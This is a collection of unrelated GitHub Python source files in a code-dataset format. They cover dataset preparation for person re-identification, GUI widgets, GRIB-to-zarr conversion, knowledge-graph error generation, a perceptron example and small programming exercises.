if ack != \"FAIL\":\n parte = arquivo.read(2048)\n else:\n parte = False\n self.report = \"FAIL SEND\"\n self.responder(\"CLOSE CONN\", destino)\n except:\n self.report = \"FAIL SEND\"\n finally:\n arquivo.close()\n\n def receberArquivo(self, nome):\n ack = 0\n arquivo = open(nome, \"wb\")\n try:\n parte, ip, port = self.receber(ack)\n while parte != b\"CLOSE CONN\":\n arquivo.write(parte)\n ack += len(parte)\n parte, ip, port = self.receber(ack)\n self.report = \"FINISH\"\n except:\n self.report = \"FAIL SEND\"\n\n def getReport(self): return self.report\n","repo_name":"JDaniloC/Projeto-IF678-2019","sub_path":"Utils/UDP.py","file_name":"UDP.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21183135578","text":"import os\nfrom shutil import copyfile\nimport argparse\nimport shutil\n\ndownload_path = \"./raw-dataset/DukeMTMC-reID/\"\n\nparser = argparse.ArgumentParser(description='prepare')\nparser.add_argument('--Market', action='store_true', help='prepare dataset market1501')\nparser.add_argument('--Duke', action='store_true', help='prepare dataset Duke-MTMC')\nopt = parser.parse_args()\n\nif not os.path.isdir(download_path):\n print('please change the download_path')\n\nif opt.Market:\n save_path = \"./dataset/Market1501_prepare/\"\nelse:\n save_path = \"./dataset/DukeMTMC_prepare/\"\n\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n# -----------------------------------------\n# query\nquery_path = download_path + '/query'\nquery_save_path = save_path + '/query'\nif not os.path.exists(query_save_path):\n os.makedirs(query_save_path)\n\nfor root, dirs, files in os.walk(query_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = query_path + '/' + name\n dst_path = query_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# -----------------------------------------\n# gallery\ngallery_path = download_path + '/bounding_box_test'\ngallery_save_path = save_path + '/gallery'\nif not os.path.exists(gallery_save_path):\n os.makedirs(gallery_save_path)\n\nfor root, dirs, files in os.walk(gallery_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = gallery_path + '/' + name\n dst_path = gallery_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# ---------------------------------------\n# train_all\ntrain_path = download_path + '/bounding_box_train'\ntrain_save_path = save_path + '/train_all'\nif not os.path.exists(train_save_path):\n os.makedirs(train_save_path)\n\nfor root, dirs, files in os.walk(train_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = name.split('_')\n src_path = train_path + '/' + name\n dst_path = train_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n# ---------------------------------------\n# train_val\ntrain_path = download_path + '/bounding_box_train'\ntrain_save_path = save_path + '/train'\nval_save_path = save_path + '/val'\nif not os.path.exists(train_save_path):\n os.makedirs(train_save_path)\n os.makedirs(val_save_path)\n\nfor root, dirs, files in os.walk(train_path, topdown=True):\n for name in files:\n if not name[-3:] == 'jpg':\n continue\n ID = 
name.split('_')\n src_path = train_path + '/' + name\n dst_path = train_save_path + '/' + ID[0]\n if not os.path.isdir(dst_path):\n os.mkdir(dst_path)\n dst_path = val_save_path + '/' + ID[0] # first image is used as val image\n os.mkdir(dst_path)\n copyfile(src_path, dst_path + '/' + name)\n\n\n# ================================================================================================\n# market1501_rename\n# ================================================================================================\n\ndef parse_frame(imgname, dict_cam_seq_max={}):\n dict_cam_seq_max = {\n 11: 72681, 12: 74546, 13: 74881, 14: 74661, 15: 74891, 16: 54346, 17: 0, 18: 0,\n 21: 163691, 22: 164677, 23: 98102, 24: 0, 25: 0, 26: 0, 27: 0, 28: 0,\n 31: 161708, 32: 161769, 33: 104469, 34: 0, 35: 0, 36: 0, 37: 0, 38: 0,\n 41: 72107, 42: 72373, 43: 74810, 44: 74541, 45: 74910, 46: 50616, 47: 0, 48: 0,\n 51: 161095, 52: 161724, 53: 103487, 54: 0, 55: 0, 56: 0, 57: 0, 58: 0,\n 61: 87551, 62: 131268, 63: 95817, 64: 30952, 65: 0, 66: 0, 67: 0, 68: 0}\n fid = imgname.strip().split(\"_\")[0]\n cam = int(imgname.strip().split(\"_\")[1][1])\n seq = int(imgname.strip().split(\"_\")[1][3])\n frame = int(imgname.strip().split(\"_\")[2])\n count = imgname.strip().split(\"_\")[-1]\n # print(id)\n # print(cam) # 1\n # print(seq) # 2\n # print(frame)\n re = 0\n for i in range(1, seq):\n re = re + dict_cam_seq_max[int(str(cam) + str(i))]\n re = re + frame\n new_name = str(fid) + \"_c\" + str(cam) + \"_f\" + '{:0>7}'.format(str(re)) + \"_\" + count\n # print(new_name)\n return new_name\n\n\ndef gen_train_all_rename():\n path = \"./dataset/Market1501_prepare/train_all/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/train_all/\" + fname):\n os.makedirs(\"./dataset/market_rename/train_all/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/train_all/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_train_rename():\n path = \"./dataset/Market1501_prepare/train/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/train/\" + fname):\n os.makedirs(\"./dataset/market_rename/train/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/train/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_val_rename():\n path = \"./dataset/Market1501_prepare/val/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/val/\" + fname):\n os.makedirs(\"./dataset/market_rename/val/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + 
fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/val/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_query_rename():\n path = \"./dataset/Market1501_prepare/query/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/query/\" + fname):\n os.makedirs(\"./dataset/market_rename/query/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/query/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\ndef gen_gallery_rename():\n path = \"./dataset/Market1501_prepare/gallery/\"\n folderName = []\n for root, dirs, files in os.walk(path):\n folderName = dirs\n break\n # print(len(folderName))\n\n for fname in folderName:\n # print(fname)\n\n if not os.path.exists(\"./dataset/market_rename/gallery/\" + fname):\n os.makedirs(\"./dataset/market_rename/gallery/\" + fname)\n\n img_names = []\n for root, dirs, files in os.walk(path + fname):\n img_names = files\n break\n # print(img_names)\n # print(len(img_names))\n for imgname in img_names:\n newname = parse_frame(imgname)\n # print(newname)\n srcfile = path + fname + \"/\" + imgname\n dstfile = \"./dataset/market_rename/gallery/\" + fname + \"/\" + newname\n shutil.copyfile(srcfile, dstfile)\n # break # 测试一个id\n\n\nif opt.Market:\n gen_train_all_rename()\n gen_train_rename()\n gen_val_rename()\n gen_query_rename()\n gen_gallery_rename()\n shutil.rmtree(\"./dataset/Market1501_prepare/\")\n print(\"Done!\")\n","repo_name":"Wanggcong/Spatial-Temporal-Re-identification","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":9327,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"61"} +{"seq_id":"25367575775","text":"from PySide6.QtWidgets import *\nfrom Stylesheet import GuiColor\nfrom PySide6.QtGui import QIcon\nfrom EthFrame import EthFrame\nfrom GuiButton import GuiButton\n\n\nclass PaymentFrame(QFrame):\n def __init__(self):\n super().__init__()\n self.setStyleSheet(GuiColor.LIGHT_SECONDARY.value)\n self.setFixedHeight(100)\n\n # layout\n self.layout = QHBoxLayout()\n self.setLayout(self.layout)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # receive button\n self.request_button = GuiButton(\"\")\n self.request_button.setIcon(QIcon('Gui/icons/download_icon.png'))\n self.layout.addWidget(self.request_button)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # memo and eth dial\n self.eth_frame = EthFrame()\n self.layout.addWidget(self.eth_frame)\n\n # horizontal spacer\n self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n # sent button\n self.send_button = GuiButton(\"\")\n self.send_button.setIcon(QIcon(\"Gui/icons/paper_plane_icon.png\"))\n self.layout.addWidget(self.send_button)\n\n # horizontal spacer\n 
self.layout.addSpacerItem(QSpacerItem(10, 10, QSizePolicy.Expanding, QSizePolicy.Fixed))\n","repo_name":"aaronkopplin/Metallic-Desktop","sub_path":"Gui/PaymentFrame.py","file_name":"PaymentFrame.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39423423020","text":"\n\n\n\nimport xarray\nimport cfgrib\nimport glob\nimport os\n\n\n#where the NBM grib files are\ndatadir='/Volumes/SSD/Users/Travis/Programs/Air/python3/grib_to_zarr/NBM'\n#name of the NBM grib files to convert\nfiles='*grib2'\n#output directory for zarr files\noutdir='/Volumes/SSD/Users/Travis/Programs/Air/python3/grib_to_zarr/NBM_zarr'\n#concatenated grib file; no need to change\nmaster_grib='out.grib' \n\ndef main():\n concat()\n grib_to_zarr()\n\n\ndef concat():\n if not os.path.isfile(datadir+'/'+master_grib):\n print(\"Concatenating grib files\")\n with open(datadir+'/'+master_grib,'wb') as outfile:\n for filename in glob.glob(datadir+'/'+files):\n with open(filename, \"rb\") as infile:\n outfile.write(infile.read())\n\n\n\ndef grib_to_zarr():\n\n print(\"Converting gribs to zarr\")\n #if output directory doesn't exist, create it\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n\n alldata = cfgrib.open_datasets(datadir+'/'+master_grib,backend_kwargs={'read_keys': ['gridType']})\n\n for data in alldata:\n print(\"\")\n \n for varname, da in data.data_vars.items():\n gribname = data[varname].attrs['long_name'] #long_name #GRIB_shortName\n gribname = gribname.replace(\" \", \".\")\n step = data[varname].attrs['GRIB_stepType']\n try: \n level = data[varname].attrs['GRIB_typeOfLevel']\n except:\n level = 'unknown'\n\n\n outfile = outdir + '/' + gribname+'_'+level+'_'+step\n \n print (outfile)\n d2 = data[varname].to_dataset()\n\n #without the load, rechunking on grib takes forever\n d2.load() \n\n #now chunk\n #don't put chunking before load, otherwise it loads the whole dataset, takes forever\n if 'x' in data[varname].dims and 'y' in data[varname].dims and 'step' in data[varname].dims:\n d2 = d2.chunk({\"x\":150, \"y\":150, \"step\": -1}) \n else:\n d2 = d2.chunk({\"x\":150, \"y\":150})\n\n d2.to_zarr(outfile+'.zarr',mode='w')\n d2.to_netcdf(outfile+'.nc',mode='w')\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"NOAA-GSL/idss-engine-commons","sub_path":"python/grib_to_zarr/GribToZarr.py","file_name":"GribToZarr.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28241744063","text":"import bisect\r\n \r\nt = int(input())\r\nMOD = 1000000007\r\nfor _ in range(t):\r\n p, q, r = [int(x) for x in input().split()]\r\n a = [int(x) for x in input().split()]\r\n b = [int(x) for x in input().split()]\r\n c = [int(x) for x in input().split()]\r\n a.sort()\r\n c.sort()\r\n sum_a = []\r\n sum_c = []\r\n sum_a.append(a[0])\r\n sum_c.append(c[0])\r\n for i in range(1, p):\r\n sum_a.append((sum_a[i-1] + a[i]) % MOD)\r\n for i in range(1, r):\r\n sum_c.append((sum_c[i-1] + c[i]) % MOD)\r\n total = 0\r\n for i in range(q):\r\n inda = bisect.bisect_right(a, b[i])\r\n indc = bisect.bisect_right(c, b[i])\r\n # print(inda, indc, b[i])\r\n suma = 0\r\n sumc = 0\r\n if inda > 0 and indc > 0:\r\n suma = (sum_a[inda-1] + inda * b[i]) % MOD\r\n sumc = (sum_c[indc-1] + indc * b[i]) % MOD\r\n total += suma * sumc\r\n total %= MOD\r\n print(total) 
\r\n","repo_name":"abhiy13/CP-Solutions","sub_path":"Practice/SUMQ.py","file_name":"SUMQ.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5773411335","text":"import os\nimport pandas as pd\nfrom sklearn import metrics\n\nimport VariantEncoderFactory\nfrom EventGraph import EventGraph\nfrom GraphConfigurator import GraphConfigurator\n\n\nclass TaskClusterExplorer:\n def __init__(self, graph, analysis_directory):\n print(\"Initializing task cluster evaluator...\")\n self.graph = graph\n self.analysis_directory = analysis_directory\n self.output_directory_variants_clustered = os.path.join(self.analysis_directory, \"variant_visualizations\")\n\n self.gc = GraphConfigurator(graph)\n self.eg = EventGraph(self.gc.get_password(), self.gc.get_entity_labels())\n\n self.df_variants_clustered = self.eg.query_cluster_variants()\n\n def get_variants_clustered(self):\n return self.df_variants_clustered\n\n def get_cluster_list(self):\n cluster_list = list(self.df_variants_clustered['cluster'].unique())\n return cluster_list\n\n def evaluate_silhouette_task_cluster_overlap(self, cluster_pair):\n e = VariantEncoderFactory.get_variant_encoder(self.gc.get_name_data_set())\n df_variants_to_evaluate = self.df_variants_clustered[self.df_variants_clustered['cluster'].str.get(0) == \"T\"].copy()\n df_variants_encoded = e.encode(df_variants_to_evaluate)\n df_variants_to_evaluate.loc[:, 'cluster'] = df_variants_to_evaluate['cluster'].str.lstrip(\n \"T\").astype('int')\n df_variants_to_evaluate.loc[:, 'cluster_tasks_merged'] = df_variants_to_evaluate['cluster']\n df_variants_to_evaluate.loc[\n df_variants_to_evaluate['cluster_tasks_merged'] == cluster_pair[0], 'cluster_tasks_merged'] = \\\n cluster_pair[1]\n s_score_tasks_merged = metrics.silhouette_score(df_variants_encoded.values,\n df_variants_to_evaluate['cluster_tasks_merged'].values)\n print(f\"Silhouette score tasks merged: {s_score_tasks_merged}\")\n s_score_original = metrics.silhouette_score(df_variants_encoded.values,\n df_variants_to_evaluate['cluster'].values)\n print(f\"Silhouette score original: {s_score_original}\")\n\n def common_actions_per_task_cluster_to_csv(self):\n cluster_list = list(self.df_variants_clustered['cluster'].unique())\n df_common_actions_per_cluster = pd.DataFrame(index=cluster_list, columns=['common_actions'])\n for cluster in cluster_list:\n df_cluster = self.df_variants_clustered[self.df_variants_clustered['cluster'] == cluster].copy()\n variants_in_cluster = list(df_cluster['path'])\n common_actions = list(set(variants_in_cluster[0]).intersection(*variants_in_cluster))\n df_common_actions_per_cluster.loc[cluster, 'common_actions'] = common_actions\n df_common_actions_per_cluster = df_common_actions_per_cluster.sort_index()\n df_common_actions_per_cluster.to_csv(f\"{self.analysis_directory}\\\\variant_common_actions_per_cluster.csv\")\n","repo_name":"eklijn/event-graph-analyzing-actor-dynamics","sub_path":"TaskClusterExplorer.py","file_name":"TaskClusterExplorer.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70319207874","text":"import sys\n\nfrom argparse import ArgumentParser\nfrom util import loadGraphNpz, loadTypesNpz, load_entities_dict, load_types_dict, \\\n load_domains, load_ranges, load_relations_dict, to_triples, load_type_hierarchy, load_prop_hierarchy\nimport numpy as np\nfrom skge.sample import 
LCWASampler, CorruptedSampler, RandomSampler\nfrom random import randint\nfrom scipy.sparse import csr_matrix, coo_matrix\nfrom collections import defaultdict as ddict\nfrom tqdm import tqdm\nfrom copy import deepcopy\n\n\ndef generate_wrong_fact(X, types=None, domains=None, ranges=None, kind=1, p_error=0.001):\n\n    assert kind == 1 or (kind == 2 and types is not None)\n\n    triples = to_triples(X, order=\"sop\", dtype=\"list\")\n\n    types_csc = types.tocsc(copy=True) if types is not None and types.nnz else None\n\n    n_entities = X[0].shape[0]\n    n_facts = sum([xi.nnz for xi in X])\n    n_wrong_facts = int(n_facts * p_error)\n\n    n_types = types.shape[1]\n    omnipresent_types = [i for i in range(n_types) if types_csc is not None and types_csc[:,i].nnz == n_entities]\n\n    print(\"%d erroneous facts of kind %d to be generated\" % (n_wrong_facts, kind))\n\n    sample = np.random.choice(len(triples), n_wrong_facts, replace=False)\n    to_be_corrupted = [triples[i] for i in sample]\n\n    if kind > 0:\n        print(\"Creating type groups\")\n        pbar = tqdm(total=types.shape[0])\n        types_entitities = ddict(lambda: set())\n        for i, x in enumerate(types):\n            types_entitities[tuple(x.indices)].add(i)\n            pbar.update(1)\n        pbar.close()\n\n    errors_list = []\n    print(\"Creating erroneous facts\")\n    pbar = tqdm(total=len(to_be_corrupted))\n    for t in to_be_corrupted:\n        corrupted = list(t)\n\n        # randomly choose between corrupt subject or object\n        t_i = randint(0, 1)\n        if kind > 0:\n            while True:\n                t_i = randint(0, 1)\n                e = t[t_i]\n                e_types = tuple(types[e].indices)\n                same_types = types_entitities[e_types]\n                if len(same_types) > 1 or kind != 1:\n                    break\n\n            if kind and len(same_types) == n_entities and kind > 1:\n                same_types = set()\n\n\n        if kind == 1:\n            while True:\n                corrupted[t_i] = randint(0, n_entities - 1)\n                if corrupted not in triples and corrupted not in errors_list:\n                    break\n\n        elif kind == 2:\n            candidates = [i for i in same_types if i != e]\n            while True:\n                corrupted[t_i] = candidates[randint(0, len(candidates) - 1)]\n                if corrupted not in triples and corrupted not in errors_list:\n                    break\n\n        else:\n            # raising a bare string is invalid and the original format string had two\n            # placeholders for one argument; raise a proper exception instead\n            raise ValueError(\"Error kind %d is not supported. Please choose from [1,2]\" % kind)\n\n        errors_list.append(tuple(corrupted))\n\n        pbar.update(1)\n\n    pbar.close()\n\n    return errors_list\n\n\ndef update_data(X, errors):\n    cols = [[] for p in range(len(X))]\n    rows = [[] for p in range(len(X))]\n    data = [[] for p in range(len(X))]\n    for s, o, p in errors:\n        rows[p].append(s)\n        cols[p].append(o)\n        data[p].append(True)\n\n    for p in range(len(X)):\n        X[p] = coo_matrix((list(X[p].data) + data[p], (list(X[p].row) + rows[p], list(X[p].col) + cols[p])),\n                          shape=X[p].shape)\n\n    return X\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser(\n        \"Generates error detection data in knowledge graphs by randomly corrupting triples in order to generate wrong facts. 
\"\n \"These wrong facts can be of three kinds:\"\n \" 1 - Randomly corrupted triple\"\n \" 2 - Same type as the original entity\")\n\n parser.add_argument(\"input\", type=str, default=None, help=\"Path of the input npz kb file\")\n parser.add_argument(\"-pe\", \"--p-error\", type=float, default=0.01, help=\"Proportion of errors to be generated\")\n parser.add_argument(\"-ek\", \"--error-kind\", type=int, default=1, help=\"Kind of errors to be generated [1,2]\")\n\n args = parser.parse_args()\n\n output_path = args.input.replace(\".npz\", \"-errdet-ek%d-p%f.npz\" % (args.error_kind, args.p_error))\n\n d = np.load(args.input, allow_pickle=True)\n X = d[\"data\"]\n types = d[\"types\"].item()\n domains = d[\"domains\"].item()\n ranges = d[\"ranges\"].item()\n entities_dict = d[\"entities_dict\"].item()\n relations_dict = d[\"relations_dict\"].item()\n types_dict = d[\"types_dict\"].item()\n type_hier = None\n prop_hier = None\n\n entities_dict = {k: v for v,k in entities_dict.items()}\n relations_dict = {k: v for v, k in relations_dict.items()}\n\n\n # if not isinstance(types, csr_matrix):\n # if not isinstance(types, coo_matrix):\n types = coo_matrix(types)\n types = types.tocsr()\n\n errors_list = generate_wrong_fact(X, types, domains, ranges, args.error_kind, args.p_error)\n\n X = update_data(X, errors_list)\n\n # Change node objects to ids to avoid maximum recursion depth\n if type_hier is not None:\n for i, n in type_hier.items():\n n.children = [c.node_id for c in n.children]\n n.parents = [p.node_id for p in n.parents]\n if prop_hier is not None:\n for i, n in prop_hier.items():\n n.children = [c.node_id for c in n.children]\n n.parents = [p.node_id for p in n.parents]\n\n np.savez(output_path, data=X,\n types=types,\n domains=domains,\n ranges=ranges,\n entities_dict=entities_dict,\n types_dict=types_dict,\n relations_dict=relations_dict,\n type_hierarchy=type_hier,\n prop_hierarchy=prop_hier,\n errors=errors_list)\n","repo_name":"aolimelo/kged","sub_path":"generate_errors.py","file_name":"generate_errors.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"37848086328","text":"from Util import sgn, DEFAULT_DIMENSION, Point\nfrom Barrier import Barrier\nfrom Water import WaterElement\nfrom Air import Air\nfrom Deflector import Deflector\n\nclass Board:\n def __init__(self, balls=None, barriers=None, deflectors=None, water=None, dim=None, verbose=False):\n self.balls = balls or []\n self.dim = dim or DEFAULT_DIMENSION\n self.barriers = barriers or []\n self.water = water or []\n self.history = []\n self.recordPositions()\n self.verbose = verbose\n self.deflectors = deflectors or []\n\n def recordPositions(self):\n self.history.extend(ball.pos for ball in self.balls)\n\n def getItemAt(self, x, y=None):\n if y is None:\n x, y = x\n for obj in self.water + self.barriers + self.deflectors:\n if obj.pos == Point(x,y):\n return obj\n return Air(x,y)\n\n def applyGravity(self):\n for ball in self.balls:\n there = self.getItemAt(ball.pos)\n below = self.getItemAt(ball.pos.x, ball.pos.y-1)\n if there.kind == 'air' and below.isYielding:\n ball.vy -= 1\n\n def update(self):\n for ball in self.balls:\n ball.move()\n\n self.resolveCollisions()\n self.recordPositions()\n\n self.applyGravity()\n if self.verbose:\n print(self.balls, '\\n\\n')\n\n def resolveCollisions(self):\n for ball in self.balls:\n for barrier in self.barriers:\n if ball.pos == barrier.pos:\n barrier.bounceBall(ball)\n\n for 
ball in self.balls:\n for waterElement in self.water:\n if ball.pos == waterElement.pos:\n waterElement.bouyBall(ball)\n\n for ball in self.balls:\n for deflector in self.deflectors:\n if ball.pos == deflector.pos:\n deflector.deflectBall(ball)\n\n def getArrayRepr(self):\n out = [[None]*self.dim.width for i in range(self.dim.height)]\n for waterElement in self.water:\n if self.isOnBoard(waterElement):\n out[(self.dim.height-1)-waterElement.y][waterElement.x] = waterElement.icon\n for barrier in self.barriers:\n if self.isOnBoard(barrier):\n out[(self.dim.height-1)-barrier.y][barrier.x] = barrier.char\n\n for deflector in self.deflectors:\n if self.isOnBoard(deflector):\n out[(self.dim.height-1)-deflector.y][deflector.x] = deflector.dir\n\n for ball in self.balls:\n if self.isOnBoard(ball):\n out[(self.dim.height-1)-ball.y][ball.x] = 'O'\n return out\n\n def isOnBoard(self, obj):\n return 0 <= obj.x < self.dim.width and 0 <= obj.y < self.dim.height\n\n def __str__(self):\n array = self.getArrayRepr()\n out = ''\n block = ''\n out += block*(len(array[0]) + 2) + '\\n'\n for row in array:\n out += block\n for el in row:\n out += el if el is not None else ' '\n out += block\n out += '\\n'\n out += block*(len(array[0]) + 2)\n return out\n","repo_name":"nathanfdunn/little-phys","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72615528834","text":"def encrypt(s):\r\n res = \"\"\r\n for letter in s:\r\n if letter != \" \":\r\n ascii_num = ord(letter) + 9\r\n letter = chr(ascii_num)\r\n if letter == \" \" or letter.isalpha():\r\n res += letter\r\n return res\r\n\r\ndef change_case(s):\r\n res = \"\"\r\n for letter in s:\r\n if letter.islower():\r\n letter = letter.upper()\r\n elif letter.isupper(): \r\n letter = letter.lower()\r\n res += letter\r\n\r\n return res\r\n\r\nmy_s = input()\r\nprint(encrypt(my_s))\r\nprint(change_case(encrypt(my_s)))\r\n","repo_name":"boce1/school","sub_path":"seminarni/3/primer3.py","file_name":"primer3.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42268235277","text":"import os\nimport pdb\nfrom networkx.readwrite import json_graph\nfrom query_representation.utils import *\nfrom query_representation.query import *\n\nOUTPUT_DIR=\"./queries/joblight/all_joblight/\"\nINPUT_FN = \"./queries/joblight.sql\"\nOUTPUT_FN_TMP = \"{i}.sql\"\n\nmake_dir(OUTPUT_DIR)\n\nwith open(INPUT_FN, \"r\") as f:\n data = f.read()\n\nqueries = data.split(\";\")\nfor i, sql in enumerate(queries):\n output_fn = OUTPUT_DIR + str(i+1) + \".pkl\"\n if \"SELECT\" not in sql:\n continue\n\n qrep = parse_sql(sql, None, None, None, None, None,\n compute_ground_truth=False)\n\n qrep[\"subset_graph\"] = \\\n nx.OrderedDiGraph(json_graph.adjacency_graph(qrep[\"subset_graph\"]))\n qrep[\"join_graph\"] = json_graph.adjacency_graph(qrep[\"join_graph\"])\n\n save_qrep(output_fn, qrep)\n\n","repo_name":"learnedsystems/CEB","sub_path":"scripts/sql_to_qrep.py","file_name":"sql_to_qrep.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"2171703090","text":"from dependency_injector.wiring import Provide, inject\nfrom ...BaseTypes.Handlers.DeviceBase import DeviceBase\n\n\nclass Device(DeviceBase):\n\n def __init__(self, iden: int):\n 
super().__init__(iden)\n\n @classmethod\n def __factoryCreate(cls, identifier):\n return cls(identifier)\n\n @classmethod\n @inject\n def Create(cls, identifier: int, deviceInstance=Provide[\"interop\"]):\n clsObj = cls.__factoryCreate(identifier)\n mapping = clsObj.Map(identifier)\n return mapping\n\n @inject\n def Map(self, identifier: int, instance=Provide[\"interop\"]):\n _device_ref = instance.DeviceRef\n try:\n if identifier is None:\n return\n\n _dev_set = _device_ref.SetId(identifier)\n\n if _dev_set > 0:\n name = _device_ref.GetName()\n r = self.__factoryCreate(_device_ref.GetId())\n return r\n\n except:\n raise\n\n finally:\n # clsObj.DisposeIdEx()\n pass\n","repo_name":"chrisbewz/e3-panel-distance-estimator","sub_path":"RouteEstimator/Implementations/E3Objects/DeviceComponent.py","file_name":"DeviceComponent.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43502902173","text":"\nimport numpy as np\nfrom perceptron_unigrams.utils import get_corpus_word_doc_count, create_word_index_map, get_key, get_doc_word_freq, build_sparse_unigram_dtm, build_sparse_tfidf_dtm\nfrom sklearn.model_selection import train_test_split\nfrom perceptron_unigrams.perceptron import Perceptron\n\n\ndef main():\n\n data = pd.read_csv('review_data.csv')\n\n X = data['text']\n y = data['label']\n\n word_doc_count = get_corpus_word_doc_count(X)\n\n # remove words that only appear in one document out of the entire corpus\n word_doc_count = {k: v for k, v in word_doc_count.items() if v != 1}\n\n # sort dictionary alphabetically by key\n word_doc_count = dict(sorted(word_doc_count.items(), key=lambda x: x[0]))\n\n word_index_map = create_word_index_map(word_doc_count)\n\n unigram_dtm = build_sparse_unigram_dtm(X, y, word_index_map)\n\n train, test = train_test_split(unigram_dtm, test_size=0.25, random_state=11)\n\n clf = Perceptron(n_epochs=2)\n clf.fit(train)\n\n y_pred = clf.predict(test)\n return y_pred\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"melsyt/machine-learning-hw","sub_path":"perceptron_unigrams/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26644021254","text":"'''\nПроцедура randomized_select() находит элемент массива, который находился бы в\nотсортированном массиве на месте с заданным индексом. 
